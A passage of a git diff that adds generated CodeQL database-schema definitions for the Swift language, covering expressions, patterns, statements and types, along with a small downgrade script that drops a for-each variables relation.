+property_wrapper_value_placeholder_exprs( //dir=expr + unique int id: @property_wrapper_value_placeholder_expr, + int placeholder: @opaque_value_expr_or_none ref +); + +#keyset[id] +property_wrapper_value_placeholder_expr_wrapped_values( //dir=expr + int id: @property_wrapper_value_placeholder_expr ref, + int wrapped_value: @expr_or_none ref +); + +rebind_self_in_initializer_exprs( //dir=expr + unique int id: @rebind_self_in_initializer_expr, + int sub_expr: @expr_or_none ref, + int self: @var_decl_or_none ref +); + +sequence_exprs( //dir=expr + unique int id: @sequence_expr +); + +#keyset[id, index] +sequence_expr_elements( //dir=expr + int id: @sequence_expr ref, + int index: int ref, + int element: @expr_or_none ref +); + +single_value_stmt_exprs( //dir=expr + unique int id: @single_value_stmt_expr, + int stmt: @stmt_or_none ref +); + +super_ref_exprs( //dir=expr + unique int id: @super_ref_expr, + int self: @var_decl_or_none ref +); + +tap_exprs( //dir=expr + unique int id: @tap_expr, + int body: @brace_stmt_or_none ref, + int var: @var_decl_or_none ref +); + +#keyset[id] +tap_expr_sub_exprs( //dir=expr + int id: @tap_expr ref, + int sub_expr: @expr_or_none ref +); + +tuple_element_exprs( //dir=expr + unique int id: @tuple_element_expr, + int sub_expr: @expr_or_none ref, + int index: int ref +); + +tuple_exprs( //dir=expr + unique int id: @tuple_expr +); + +#keyset[id, index] +tuple_expr_elements( //dir=expr + int id: @tuple_expr ref, + int index: int ref, + int element: @expr_or_none ref +); + +type_exprs( //dir=expr + unique int id: @type_expr +); + +#keyset[id] +type_expr_type_reprs( //dir=expr + int id: @type_expr ref, + int type_repr: @type_repr_or_none ref +); + +unresolved_decl_ref_exprs( //dir=expr + unique int id: @unresolved_decl_ref_expr +); + +#keyset[id] +unresolved_decl_ref_expr_names( //dir=expr + int id: @unresolved_decl_ref_expr ref, + string name: string ref +); + +unresolved_dot_exprs( //dir=expr + unique int id: @unresolved_dot_expr, + int base: @expr_or_none ref, + string name: string ref +); + +unresolved_member_exprs( //dir=expr + unique int id: @unresolved_member_expr, + string name: string ref +); + +unresolved_pattern_exprs( //dir=expr + unique int id: @unresolved_pattern_expr, + int sub_pattern: @pattern_or_none ref +); + +unresolved_specialize_exprs( //dir=expr + unique int id: @unresolved_specialize_expr, + int sub_expr: @expr_or_none ref +); + +vararg_expansion_exprs( //dir=expr + unique int id: @vararg_expansion_expr, + int sub_expr: @expr_or_none ref +); + +abi_safe_conversion_exprs( //dir=expr + unique int id: @abi_safe_conversion_expr +); + +any_hashable_erasure_exprs( //dir=expr + unique int id: @any_hashable_erasure_expr +); + +archetype_to_super_exprs( //dir=expr + unique int id: @archetype_to_super_expr +); + +array_exprs( //dir=expr + unique int id: @array_expr +); + +#keyset[id, index] +array_expr_elements( //dir=expr + int id: @array_expr ref, + int index: int ref, + int element: @expr_or_none ref +); + +array_to_pointer_exprs( //dir=expr + unique int id: @array_to_pointer_expr +); + +auto_closure_exprs( //dir=expr + unique int id: @auto_closure_expr +); + +await_exprs( //dir=expr + unique int id: @await_expr +); + +binary_exprs( //dir=expr + unique int id: @binary_expr +); + +borrow_exprs( //dir=expr + unique int id: @borrow_expr +); + +bridge_from_obj_c_exprs( //dir=expr + unique int id: @bridge_from_obj_c_expr +); + +bridge_to_obj_c_exprs( //dir=expr + unique int id: @bridge_to_obj_c_expr +); + +@builtin_literal_expr = + @boolean_literal_expr +| @magic_identifier_literal_expr +| @number_literal_expr +| @string_literal_expr +; + +call_exprs( //dir=expr + unique int id: @call_expr +); + +@checked_cast_expr = + @conditional_checked_cast_expr +| @forced_checked_cast_expr +| @is_expr +; + +class_metatype_to_object_exprs( //dir=expr + unique int id: @class_metatype_to_object_expr +); + +coerce_exprs( //dir=expr + unique int id: @coerce_expr +); + +collection_upcast_conversion_exprs( //dir=expr + unique int id: @collection_upcast_conversion_expr +); + +conditional_bridge_from_obj_c_exprs( //dir=expr + unique int id: @conditional_bridge_from_obj_c_expr +); + +covariant_function_conversion_exprs( //dir=expr + unique int id: @covariant_function_conversion_expr +); + +covariant_return_conversion_exprs( //dir=expr + unique int id: @covariant_return_conversion_expr +); + +derived_to_base_exprs( //dir=expr + unique int id: @derived_to_base_expr +); + +destructure_tuple_exprs( //dir=expr + unique int id: @destructure_tuple_expr +); + +dictionary_exprs( //dir=expr + unique int id: @dictionary_expr +); + +#keyset[id, index] +dictionary_expr_elements( //dir=expr + int id: @dictionary_expr ref, + int index: int ref, + int element: @expr_or_none ref +); + +differentiable_function_exprs( //dir=expr + unique int id: @differentiable_function_expr +); + +differentiable_function_extract_original_exprs( //dir=expr + unique int id: @differentiable_function_extract_original_expr +); + +dot_self_exprs( //dir=expr + unique int id: @dot_self_expr +); + +@dynamic_lookup_expr = + @dynamic_member_ref_expr +| @dynamic_subscript_expr +; + +erasure_exprs( //dir=expr + unique int id: @erasure_expr +); + +existential_metatype_to_object_exprs( //dir=expr + unique int id: @existential_metatype_to_object_expr +); + +explicit_closure_exprs( //dir=expr + unique int id: @explicit_closure_expr +); + +force_try_exprs( //dir=expr + unique int id: @force_try_expr +); + +foreign_object_conversion_exprs( //dir=expr + unique int id: @foreign_object_conversion_expr +); + +function_conversion_exprs( //dir=expr + unique int id: @function_conversion_expr +); + +in_out_to_pointer_exprs( //dir=expr + unique int id: @in_out_to_pointer_expr +); + +inject_into_optional_exprs( //dir=expr + unique int id: @inject_into_optional_expr +); + +interpolated_string_literal_exprs( //dir=expr + unique int id: @interpolated_string_literal_expr +); + +#keyset[id] +interpolated_string_literal_expr_interpolation_exprs( //dir=expr + int id: @interpolated_string_literal_expr ref, + int interpolation_expr: @opaque_value_expr_or_none ref +); + +#keyset[id] +interpolated_string_literal_expr_appending_exprs( //dir=expr + int id: @interpolated_string_literal_expr ref, + int appending_expr: @tap_expr_or_none ref +); + +linear_function_exprs( //dir=expr + unique int id: @linear_function_expr +); + +linear_function_extract_original_exprs( //dir=expr + unique int id: @linear_function_extract_original_expr +); + +linear_to_differentiable_function_exprs( //dir=expr + unique int id: @linear_to_differentiable_function_expr +); + +load_exprs( //dir=expr + unique int id: @load_expr +); + +member_ref_exprs( //dir=expr + unique int id: @member_ref_expr +); + +#keyset[id] +member_ref_expr_has_direct_to_storage_semantics( //dir=expr + int id: @member_ref_expr ref +); + +#keyset[id] +member_ref_expr_has_direct_to_implementation_semantics( //dir=expr + int id: @member_ref_expr ref +); + +#keyset[id] +member_ref_expr_has_ordinary_semantics( //dir=expr + int id: @member_ref_expr ref +); + +#keyset[id] +member_ref_expr_has_distributed_thunk_semantics( //dir=expr + int id: @member_ref_expr ref +); + +metatype_conversion_exprs( //dir=expr + unique int id: @metatype_conversion_expr +); + +nil_literal_exprs( //dir=expr + unique int id: @nil_literal_expr +); + +object_literal_exprs( //dir=expr + unique int id: @object_literal_expr, + int kind: int ref +); + +#keyset[id, index] +object_literal_expr_arguments( //dir=expr + int id: @object_literal_expr ref, + int index: int ref, + int argument: @argument_or_none ref +); + +optional_try_exprs( //dir=expr + unique int id: @optional_try_expr +); + +paren_exprs( //dir=expr + unique int id: @paren_expr +); + +pointer_to_pointer_exprs( //dir=expr + unique int id: @pointer_to_pointer_expr +); + +postfix_unary_exprs( //dir=expr + unique int id: @postfix_unary_expr +); + +prefix_unary_exprs( //dir=expr + unique int id: @prefix_unary_expr +); + +protocol_metatype_to_object_exprs( //dir=expr + unique int id: @protocol_metatype_to_object_expr +); + +regex_literal_exprs( //dir=expr + unique int id: @regex_literal_expr, + string pattern: string ref, + int version: int ref +); + +@self_apply_expr = + @dot_syntax_call_expr +| @initializer_ref_call_expr +; + +#keyset[id] +self_apply_exprs( //dir=expr + int id: @self_apply_expr ref, + int base: @expr_or_none ref +); + +string_to_pointer_exprs( //dir=expr + unique int id: @string_to_pointer_expr +); + +subscript_exprs( //dir=expr + unique int id: @subscript_expr +); + +#keyset[id, index] +subscript_expr_arguments( //dir=expr + int id: @subscript_expr ref, + int index: int ref, + int argument: @argument_or_none ref +); + +#keyset[id] +subscript_expr_has_direct_to_storage_semantics( //dir=expr + int id: @subscript_expr ref +); + +#keyset[id] +subscript_expr_has_direct_to_implementation_semantics( //dir=expr + int id: @subscript_expr ref +); + +#keyset[id] +subscript_expr_has_ordinary_semantics( //dir=expr + int id: @subscript_expr ref +); + +#keyset[id] +subscript_expr_has_distributed_thunk_semantics( //dir=expr + int id: @subscript_expr ref +); + +try_exprs( //dir=expr + unique int id: @try_expr +); + +underlying_to_opaque_exprs( //dir=expr + unique int id: @underlying_to_opaque_expr +); + +unevaluated_instance_exprs( //dir=expr + unique int id: @unevaluated_instance_expr +); + +unresolved_member_chain_result_exprs( //dir=expr + unique int id: @unresolved_member_chain_result_expr +); + +unresolved_type_conversion_exprs( //dir=expr + unique int id: @unresolved_type_conversion_expr +); + +boolean_literal_exprs( //dir=expr + unique int id: @boolean_literal_expr, + boolean value: boolean ref +); + +conditional_checked_cast_exprs( //dir=expr + unique int id: @conditional_checked_cast_expr +); + +dot_syntax_call_exprs( //dir=expr + unique int id: @dot_syntax_call_expr +); + +dynamic_member_ref_exprs( //dir=expr + unique int id: @dynamic_member_ref_expr +); + +dynamic_subscript_exprs( //dir=expr + unique int id: @dynamic_subscript_expr +); + +forced_checked_cast_exprs( //dir=expr + unique int id: @forced_checked_cast_expr +); + +initializer_ref_call_exprs( //dir=expr + unique int id: @initializer_ref_call_expr +); + +is_exprs( //dir=expr + unique int id: @is_expr +); + +magic_identifier_literal_exprs( //dir=expr + unique int id: @magic_identifier_literal_expr, + string kind: string ref +); + +@number_literal_expr = + @float_literal_expr +| @integer_literal_expr +; + +string_literal_exprs( //dir=expr + unique int id: @string_literal_expr, + string value: string ref +); + +float_literal_exprs( //dir=expr + unique int id: @float_literal_expr, + string string_value: string ref +); + +integer_literal_exprs( //dir=expr + unique int id: @integer_literal_expr, + string string_value: string ref +); + +@pattern = + @any_pattern +| @binding_pattern +| @bool_pattern +| @enum_element_pattern +| @expr_pattern +| @is_pattern +| @named_pattern +| @optional_some_pattern +| @paren_pattern +| @tuple_pattern +| @typed_pattern +; + +#keyset[id] +pattern_types( //dir=pattern + int id: @pattern ref, + int type_: @type_or_none ref +); + +any_patterns( //dir=pattern + unique int id: @any_pattern +); + +binding_patterns( //dir=pattern + unique int id: @binding_pattern, + int sub_pattern: @pattern_or_none ref +); + +bool_patterns( //dir=pattern + unique int id: @bool_pattern, + boolean value: boolean ref +); + +enum_element_patterns( //dir=pattern + unique int id: @enum_element_pattern, + int element: @enum_element_decl_or_none ref +); + +#keyset[id] +enum_element_pattern_sub_patterns( //dir=pattern + int id: @enum_element_pattern ref, + int sub_pattern: @pattern_or_none ref +); + +expr_patterns( //dir=pattern + unique int id: @expr_pattern, + int sub_expr: @expr_or_none ref +); + +is_patterns( //dir=pattern + unique int id: @is_pattern +); + +#keyset[id] +is_pattern_cast_type_reprs( //dir=pattern + int id: @is_pattern ref, + int cast_type_repr: @type_repr_or_none ref +); + +#keyset[id] +is_pattern_sub_patterns( //dir=pattern + int id: @is_pattern ref, + int sub_pattern: @pattern_or_none ref +); + +named_patterns( //dir=pattern + unique int id: @named_pattern, + int var_decl: @var_decl_or_none ref +); + +optional_some_patterns( //dir=pattern + unique int id: @optional_some_pattern, + int sub_pattern: @pattern_or_none ref +); + +paren_patterns( //dir=pattern + unique int id: @paren_pattern, + int sub_pattern: @pattern_or_none ref +); + +tuple_patterns( //dir=pattern + unique int id: @tuple_pattern +); + +#keyset[id, index] +tuple_pattern_elements( //dir=pattern + int id: @tuple_pattern ref, + int index: int ref, + int element: @pattern_or_none ref +); + +typed_patterns( //dir=pattern + unique int id: @typed_pattern, + int sub_pattern: @pattern_or_none ref +); + +#keyset[id] +typed_pattern_type_reprs( //dir=pattern + int id: @typed_pattern ref, + int type_repr: @type_repr_or_none ref +); + +case_label_items( //dir=stmt + unique int id: @case_label_item, + int pattern: @pattern_or_none ref +); + +#keyset[id] +case_label_item_guards( //dir=stmt + int id: @case_label_item ref, + int guard: @expr_or_none ref +); + +condition_elements( //dir=stmt + unique int id: @condition_element +); + +#keyset[id] +condition_element_booleans( //dir=stmt + int id: @condition_element ref, + int boolean_: @expr_or_none ref +); + +#keyset[id] +condition_element_patterns( //dir=stmt + int id: @condition_element ref, + int pattern: @pattern_or_none ref +); + +#keyset[id] +condition_element_initializers( //dir=stmt + int id: @condition_element ref, + int initializer: @expr_or_none ref +); + +#keyset[id] +condition_element_availabilities( //dir=stmt + int id: @condition_element ref, + int availability: @availability_info_or_none ref +); + +@stmt = + @brace_stmt +| @break_stmt +| @case_stmt +| @continue_stmt +| @defer_stmt +| @discard_stmt +| @fail_stmt +| @fallthrough_stmt +| @labeled_stmt +| @pound_assert_stmt +| @return_stmt +| @then_stmt +| @throw_stmt +| @yield_stmt +; + +stmt_conditions( //dir=stmt + unique int id: @stmt_condition +); + +#keyset[id, index] +stmt_condition_elements( //dir=stmt + int id: @stmt_condition ref, + int index: int ref, + int element: @condition_element_or_none ref +); + +brace_stmts( //dir=stmt + unique int id: @brace_stmt +); + +#keyset[id, index] +brace_stmt_elements( //dir=stmt + int id: @brace_stmt ref, + int index: int ref, + int element: @ast_node_or_none ref +); + +break_stmts( //dir=stmt + unique int id: @break_stmt +); + +#keyset[id] +break_stmt_target_names( //dir=stmt + int id: @break_stmt ref, + string target_name: string ref +); + +#keyset[id] +break_stmt_targets( //dir=stmt + int id: @break_stmt ref, + int target: @stmt_or_none ref +); + +case_stmts( //dir=stmt + unique int id: @case_stmt, + int body: @stmt_or_none ref +); + +#keyset[id, index] +case_stmt_labels( //dir=stmt + int id: @case_stmt ref, + int index: int ref, + int label: @case_label_item_or_none ref +); + +#keyset[id, index] +case_stmt_variables( //dir=stmt + int id: @case_stmt ref, + int index: int ref, + int variable: @var_decl_or_none ref +); + +continue_stmts( //dir=stmt + unique int id: @continue_stmt +); + +#keyset[id] +continue_stmt_target_names( //dir=stmt + int id: @continue_stmt ref, + string target_name: string ref +); + +#keyset[id] +continue_stmt_targets( //dir=stmt + int id: @continue_stmt ref, + int target: @stmt_or_none ref +); + +defer_stmts( //dir=stmt + unique int id: @defer_stmt, + int body: @brace_stmt_or_none ref +); + +discard_stmts( //dir=stmt + unique int id: @discard_stmt, + int sub_expr: @expr_or_none ref +); + +fail_stmts( //dir=stmt + unique int id: @fail_stmt +); + +fallthrough_stmts( //dir=stmt + unique int id: @fallthrough_stmt, + int fallthrough_source: @case_stmt_or_none ref, + int fallthrough_dest: @case_stmt_or_none ref +); + +@labeled_stmt = + @do_catch_stmt +| @do_stmt +| @for_each_stmt +| @labeled_conditional_stmt +| @repeat_while_stmt +| @switch_stmt +; + +#keyset[id] +labeled_stmt_labels( //dir=stmt + int id: @labeled_stmt ref, + string label: string ref +); + +pound_assert_stmts( //dir=stmt + unique int id: @pound_assert_stmt, + int condition: @expr_or_none ref, + string message: string ref +); + +return_stmts( //dir=stmt + unique int id: @return_stmt +); + +#keyset[id] +return_stmt_results( //dir=stmt + int id: @return_stmt ref, + int result: @expr_or_none ref +); + +then_stmts( //dir=stmt + unique int id: @then_stmt, + int result: @expr_or_none ref +); + +throw_stmts( //dir=stmt + unique int id: @throw_stmt, + int sub_expr: @expr_or_none ref +); + +yield_stmts( //dir=stmt + unique int id: @yield_stmt +); + +#keyset[id, index] +yield_stmt_results( //dir=stmt + int id: @yield_stmt ref, + int index: int ref, + int result: @expr_or_none ref +); + +do_catch_stmts( //dir=stmt + unique int id: @do_catch_stmt, + int body: @stmt_or_none ref +); + +#keyset[id, index] +do_catch_stmt_catches( //dir=stmt + int id: @do_catch_stmt ref, + int index: int ref, + int catch: @case_stmt_or_none ref +); + +do_stmts( //dir=stmt + unique int id: @do_stmt, + int body: @brace_stmt_or_none ref +); + +for_each_stmts( //dir=stmt + unique int id: @for_each_stmt, + int pattern: @pattern_or_none ref, + int body: @brace_stmt_or_none ref +); + +#keyset[id] +for_each_stmt_wheres( //dir=stmt + int id: @for_each_stmt ref, + int where: @expr_or_none ref +); + +#keyset[id] +for_each_stmt_iterator_vars( //dir=stmt + int id: @for_each_stmt ref, + int iteratorVar: @pattern_binding_decl_or_none ref +); + +#keyset[id] +for_each_stmt_next_calls( //dir=stmt + int id: @for_each_stmt ref, + int nextCall: @expr_or_none ref +); + +@labeled_conditional_stmt = + @guard_stmt +| @if_stmt +| @while_stmt +; + +#keyset[id] +labeled_conditional_stmts( //dir=stmt + int id: @labeled_conditional_stmt ref, + int condition: @stmt_condition_or_none ref +); + +repeat_while_stmts( //dir=stmt + unique int id: @repeat_while_stmt, + int condition: @expr_or_none ref, + int body: @stmt_or_none ref +); + +switch_stmts( //dir=stmt + unique int id: @switch_stmt, + int expr: @expr_or_none ref +); + +#keyset[id, index] +switch_stmt_cases( //dir=stmt + int id: @switch_stmt ref, + int index: int ref, + int case_: @case_stmt_or_none ref +); + +guard_stmts( //dir=stmt + unique int id: @guard_stmt, + int body: @brace_stmt_or_none ref +); + +if_stmts( //dir=stmt + unique int id: @if_stmt, + int then: @stmt_or_none ref +); + +#keyset[id] +if_stmt_elses( //dir=stmt + int id: @if_stmt ref, + int else: @stmt_or_none ref +); + +while_stmts( //dir=stmt + unique int id: @while_stmt, + int body: @stmt_or_none ref +); + +@type = + @any_function_type +| @any_generic_type +| @any_metatype_type +| @builtin_type +| @dependent_member_type +| @dynamic_self_type +| @error_type +| @existential_type +| @in_out_type +| @l_value_type +| @module_type +| @pack_element_type +| @pack_expansion_type +| @pack_type +| @parameterized_protocol_type +| @protocol_composition_type +| @reference_storage_type +| @substitutable_type +| @sugar_type +| @tuple_type +| @unresolved_type +; + +#keyset[id] +types( //dir=type + int id: @type ref, + string name: string ref, + int canonical_type: @type_or_none ref +); + +type_reprs( //dir=type + unique int id: @type_repr, + int type_: @type_or_none ref +); + +@any_function_type = + @function_type +| @generic_function_type +; + +#keyset[id] +any_function_types( //dir=type + int id: @any_function_type ref, + int result: @type_or_none ref +); + +#keyset[id, index] +any_function_type_param_types( //dir=type + int id: @any_function_type ref, + int index: int ref, + int param_type: @type_or_none ref +); + +#keyset[id] +any_function_type_is_throwing( //dir=type + int id: @any_function_type ref +); + +#keyset[id] +any_function_type_is_async( //dir=type + int id: @any_function_type ref +); + +@any_generic_type = + @nominal_or_bound_generic_nominal_type +| @unbound_generic_type +; + +#keyset[id] +any_generic_types( //dir=type + int id: @any_generic_type ref, + int declaration: @generic_type_decl_or_none ref +); + +#keyset[id] +any_generic_type_parents( //dir=type + int id: @any_generic_type ref, + int parent: @type_or_none ref +); + +@any_metatype_type = + @existential_metatype_type +| @metatype_type +; + +@builtin_type = + @any_builtin_integer_type +| @builtin_bridge_object_type +| @builtin_default_actor_storage_type +| @builtin_executor_type +| @builtin_float_type +| @builtin_job_type +| @builtin_native_object_type +| @builtin_raw_pointer_type +| @builtin_raw_unsafe_continuation_type +| @builtin_unsafe_value_buffer_type +| @builtin_vector_type +; + +dependent_member_types( //dir=type + unique int id: @dependent_member_type, + int base_type: @type_or_none ref, + int associated_type_decl: @associated_type_decl_or_none ref +); + +dynamic_self_types( //dir=type + unique int id: @dynamic_self_type, + int static_self_type: @type_or_none ref +); + +error_types( //dir=type + unique int id: @error_type +); + +existential_types( //dir=type + unique int id: @existential_type, + int constraint: @type_or_none ref +); + +in_out_types( //dir=type + unique int id: @in_out_type, + int object_type: @type_or_none ref +); + +l_value_types( //dir=type + unique int id: @l_value_type, + int object_type: @type_or_none ref +); + +module_types( //dir=type + unique int id: @module_type, + int module: @module_decl_or_none ref +); + +pack_element_types( //dir=type + unique int id: @pack_element_type, + int pack_type: @type_or_none ref +); + +pack_expansion_types( //dir=type + unique int id: @pack_expansion_type, + int pattern_type: @type_or_none ref, + int count_type: @type_or_none ref +); + +pack_types( //dir=type + unique int id: @pack_type +); + +#keyset[id, index] +pack_type_elements( //dir=type + int id: @pack_type ref, + int index: int ref, + int element: @type_or_none ref +); + +parameterized_protocol_types( //dir=type + unique int id: @parameterized_protocol_type, + int base: @protocol_type_or_none ref +); + +#keyset[id, index] +parameterized_protocol_type_args( //dir=type + int id: @parameterized_protocol_type ref, + int index: int ref, + int arg: @type_or_none ref +); + +protocol_composition_types( //dir=type + unique int id: @protocol_composition_type +); + +#keyset[id, index] +protocol_composition_type_members( //dir=type + int id: @protocol_composition_type ref, + int index: int ref, + int member: @type_or_none ref +); + +@reference_storage_type = + @unmanaged_storage_type +| @unowned_storage_type +| @weak_storage_type +; + +#keyset[id] +reference_storage_types( //dir=type + int id: @reference_storage_type ref, + int referent_type: @type_or_none ref +); + +@substitutable_type = + @archetype_type +| @generic_type_param_type +; + +@sugar_type = + @paren_type +| @syntax_sugar_type +| @type_alias_type +; + +tuple_types( //dir=type + unique int id: @tuple_type +); + +#keyset[id, index] +tuple_type_types( //dir=type + int id: @tuple_type ref, + int index: int ref, + int type_: @type_or_none ref +); + +#keyset[id, index] +tuple_type_names( //dir=type + int id: @tuple_type ref, + int index: int ref, + string name: string ref +); + +unresolved_types( //dir=type + unique int id: @unresolved_type +); + +@any_builtin_integer_type = + @builtin_integer_literal_type +| @builtin_integer_type +; + +@archetype_type = + @local_archetype_type +| @opaque_type_archetype_type +| @pack_archetype_type +| @primary_archetype_type +; + +#keyset[id] +archetype_types( //dir=type + int id: @archetype_type ref, + int interface_type: @type_or_none ref +); + +#keyset[id] +archetype_type_superclasses( //dir=type + int id: @archetype_type ref, + int superclass: @type_or_none ref +); + +#keyset[id, index] +archetype_type_protocols( //dir=type + int id: @archetype_type ref, + int index: int ref, + int protocol: @protocol_decl_or_none ref +); + +builtin_bridge_object_types( //dir=type + unique int id: @builtin_bridge_object_type +); + +builtin_default_actor_storage_types( //dir=type + unique int id: @builtin_default_actor_storage_type +); + +builtin_executor_types( //dir=type + unique int id: @builtin_executor_type +); + +builtin_float_types( //dir=type + unique int id: @builtin_float_type +); + +builtin_job_types( //dir=type + unique int id: @builtin_job_type +); + +builtin_native_object_types( //dir=type + unique int id: @builtin_native_object_type +); + +builtin_raw_pointer_types( //dir=type + unique int id: @builtin_raw_pointer_type +); + +builtin_raw_unsafe_continuation_types( //dir=type + unique int id: @builtin_raw_unsafe_continuation_type +); + +builtin_unsafe_value_buffer_types( //dir=type + unique int id: @builtin_unsafe_value_buffer_type +); + +builtin_vector_types( //dir=type + unique int id: @builtin_vector_type +); + +existential_metatype_types( //dir=type + unique int id: @existential_metatype_type +); + +function_types( //dir=type + unique int id: @function_type +); + +generic_function_types( //dir=type + unique int id: @generic_function_type +); + +#keyset[id, index] +generic_function_type_generic_params( //dir=type + int id: @generic_function_type ref, + int index: int ref, + int generic_param: @generic_type_param_type_or_none ref +); + +generic_type_param_types( //dir=type + unique int id: @generic_type_param_type +); + +metatype_types( //dir=type + unique int id: @metatype_type +); + +@nominal_or_bound_generic_nominal_type = + @bound_generic_type +| @nominal_type +; + +paren_types( //dir=type + unique int id: @paren_type, + int type_: @type_or_none ref +); + +@syntax_sugar_type = + @dictionary_type +| @unary_syntax_sugar_type +; + +type_alias_types( //dir=type + unique int id: @type_alias_type, + int decl: @type_alias_decl_or_none ref +); + +unbound_generic_types( //dir=type + unique int id: @unbound_generic_type +); + +unmanaged_storage_types( //dir=type + unique int id: @unmanaged_storage_type +); + +unowned_storage_types( //dir=type + unique int id: @unowned_storage_type +); + +weak_storage_types( //dir=type + unique int id: @weak_storage_type +); + +@bound_generic_type = + @bound_generic_class_type +| @bound_generic_enum_type +| @bound_generic_struct_type +; + +#keyset[id, index] +bound_generic_type_arg_types( //dir=type + int id: @bound_generic_type ref, + int index: int ref, + int arg_type: @type_or_none ref +); + +builtin_integer_literal_types( //dir=type + unique int id: @builtin_integer_literal_type +); + +builtin_integer_types( //dir=type + unique int id: @builtin_integer_type +); + +#keyset[id] +builtin_integer_type_widths( //dir=type + int id: @builtin_integer_type ref, + int width: int ref +); + +dictionary_types( //dir=type + unique int id: @dictionary_type, + int key_type: @type_or_none ref, + int value_type: @type_or_none ref +); + +@local_archetype_type = + @element_archetype_type +| @opened_archetype_type +; + +@nominal_type = + @class_type +| @enum_type +| @protocol_type +| @struct_type +; + +opaque_type_archetype_types( //dir=type + unique int id: @opaque_type_archetype_type, + int declaration: @opaque_type_decl_or_none ref +); + +pack_archetype_types( //dir=type + unique int id: @pack_archetype_type +); + +primary_archetype_types( //dir=type + unique int id: @primary_archetype_type +); + +@unary_syntax_sugar_type = + @array_slice_type +| @optional_type +| @variadic_sequence_type +; + +#keyset[id] +unary_syntax_sugar_types( //dir=type + int id: @unary_syntax_sugar_type ref, + int base_type: @type_or_none ref +); + +array_slice_types( //dir=type + unique int id: @array_slice_type +); + +bound_generic_class_types( //dir=type + unique int id: @bound_generic_class_type +); + +bound_generic_enum_types( //dir=type + unique int id: @bound_generic_enum_type +); + +bound_generic_struct_types( //dir=type + unique int id: @bound_generic_struct_type +); + +class_types( //dir=type + unique int id: @class_type +); + +element_archetype_types( //dir=type + unique int id: @element_archetype_type +); + +enum_types( //dir=type + unique int id: @enum_type +); + +opened_archetype_types( //dir=type + unique int id: @opened_archetype_type +); + +optional_types( //dir=type + unique int id: @optional_type +); + +protocol_types( //dir=type + unique int id: @protocol_type +); + +struct_types( //dir=type + unique int id: @struct_type +); + +variadic_sequence_types( //dir=type + unique int id: @variadic_sequence_type +); + +@accessor_or_none = + @accessor +| @unspecified_element +; + +@argument_or_none = + @argument +| @unspecified_element +; + +@associated_type_decl_or_none = + @associated_type_decl +| @unspecified_element +; + +@ast_node_or_none = + @ast_node +| @unspecified_element +; + +@availability_info_or_none = + @availability_info +| @unspecified_element +; + +@availability_spec_or_none = + @availability_spec +| @unspecified_element +; + +@brace_stmt_or_none = + @brace_stmt +| @unspecified_element +; + +@captured_decl_or_none = + @captured_decl +| @unspecified_element +; + +@case_label_item_or_none = + @case_label_item +| @unspecified_element +; + +@case_stmt_or_none = + @case_stmt +| @unspecified_element +; + +@closure_expr_or_none = + @closure_expr +| @unspecified_element +; + +@condition_element_or_none = + @condition_element +| @unspecified_element +; + +@decl_or_none = + @decl +| @unspecified_element +; + +@enum_element_decl_or_none = + @enum_element_decl +| @unspecified_element +; + +@expr_or_none = + @expr +| @unspecified_element +; + +@file_or_none = + @file +| @unspecified_element +; + +@function_or_none = + @function +| @unspecified_element +; + +@generic_type_decl_or_none = + @generic_type_decl +| @unspecified_element +; + +@generic_type_param_decl_or_none = + @generic_type_param_decl +| @unspecified_element +; + +@generic_type_param_type_or_none = + @generic_type_param_type +| @unspecified_element +; + +@initializer_or_none = + @initializer +| @unspecified_element +; + +@key_path_component_or_none = + @key_path_component +| @unspecified_element +; + +@location_or_none = + @location +| @unspecified_element +; + +@macro_role_or_none = + @macro_role +| @unspecified_element +; + +@module_decl_or_none = + @module_decl +| @unspecified_element +; + +@nominal_type_decl_or_none = + @nominal_type_decl +| @unspecified_element +; + +@opaque_type_decl_or_none = + @opaque_type_decl +| @unspecified_element +; + +@opaque_value_expr_or_none = + @opaque_value_expr +| @unspecified_element +; + +@param_decl_or_none = + @param_decl +| @unspecified_element +; + +@pattern_or_none = + @pattern +| @unspecified_element +; + +@pattern_binding_decl_or_none = + @pattern_binding_decl +| @unspecified_element +; + +@precedence_group_decl_or_none = + @precedence_group_decl +| @unspecified_element +; + +@protocol_decl_or_none = + @protocol_decl +| @unspecified_element +; + +@protocol_type_or_none = + @protocol_type +| @unspecified_element +; + +@stmt_or_none = + @stmt +| @unspecified_element +; + +@stmt_condition_or_none = + @stmt_condition +| @unspecified_element +; + +@string_literal_expr_or_none = + @string_literal_expr +| @unspecified_element +; + +@tap_expr_or_none = + @tap_expr +| @unspecified_element +; + +@type_or_none = + @type +| @unspecified_element +; + +@type_alias_decl_or_none = + @type_alias_decl +| @unspecified_element +; + +@type_expr_or_none = + @type_expr +| @unspecified_element +; + +@type_repr_or_none = + @type_repr +| @unspecified_element +; + +@value_decl_or_none = + @unspecified_element +| @value_decl +; + +@var_decl_or_none = + @unspecified_element +| @var_decl +; diff --git a/swift/downgrades/33db81ad4b606ff9a476c8dabeb9fffbf61aa829/upgrade.properties b/swift/downgrades/33db81ad4b606ff9a476c8dabeb9fffbf61aa829/upgrade.properties new file mode 100644 index 00000000000..cd7dbeeea00 --- /dev/null +++ b/swift/downgrades/33db81ad4b606ff9a476c8dabeb9fffbf61aa829/upgrade.properties @@ -0,0 +1,4 @@ +description: Remove variables from `ForEachStmt` +compatibility: partial + +for_each_stmt_variables.rel: delete diff --git a/swift/ql/lib/upgrades/44c4818a8987b5e1b3cd11e553e41045e1262451/old.dbscheme b/swift/ql/lib/upgrades/44c4818a8987b5e1b3cd11e553e41045e1262451/old.dbscheme new file mode 100644 index 00000000000..44c4818a898 --- /dev/null +++ b/swift/ql/lib/upgrades/44c4818a8987b5e1b3cd11e553e41045e1262451/old.dbscheme @@ -0,0 +1,2786 @@ +// generated by codegen/codegen.py, do not edit + +// from prefix.dbscheme +/** + * The source location of the snapshot. + */ +sourceLocationPrefix( + string prefix: string ref +); + + +// from schema.py + +@element = + @file +| @generic_context +| @locatable +| @location +| @type +; + +#keyset[id] +element_is_unknown( + int id: @element ref +); + +@file = + @db_file +; + +#keyset[id] +files( + int id: @file ref, + string name: string ref +); + +#keyset[id] +file_is_successfully_extracted( + int id: @file ref +); + +@locatable = + @argument +| @ast_node +| @comment +| @diagnostics +| @error_element +; + +#keyset[id] +locatable_locations( + int id: @locatable ref, + int location: @location_or_none ref +); + +@location = + @db_location +; + +#keyset[id] +locations( + int id: @location ref, + int file: @file_or_none ref, + int start_line: int ref, + int start_column: int ref, + int end_line: int ref, + int end_column: int ref +); + +@ast_node = + @availability_info +| @availability_spec +| @callable +| @case_label_item +| @condition_element +| @decl +| @expr +| @key_path_component +| @macro_role +| @pattern +| @stmt +| @stmt_condition +| @type_repr +; + +comments( 